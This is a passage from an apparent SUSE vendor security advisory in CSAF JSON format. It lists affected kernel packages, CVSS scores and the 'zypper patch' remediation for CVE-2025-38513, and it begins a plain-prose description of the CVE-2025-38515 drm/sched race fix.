"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38513",
"url": "https://www.suse.com/security/cve/CVE-2025-38513"
},
{
"category": "external",
"summary": "SUSE Bug 1248179 for CVE-2025-38513",
"url": "https://bugzilla.suse.com/1248179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38513"
},
{
"cve": "CVE-2025-38515",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38515"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sched: Increment job count before swapping tail spsc queue\n\nA small race exists between spsc_queue_push and the run-job worker, in\nwhich spsc_queue_push may return not-first while the run-job worker has\nalready idled due to the job count being zero. If this race occurs, job\nscheduling stops, leading to hangs while waiting on the job\u0027s DMA\nfences.\n\nSeal this race by incrementing the job count before appending to the\nSPSC queue.\n\nThis race was observed on a drm-tip 6.16-rc1 build with the Xe driver in\nan SVM test case.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
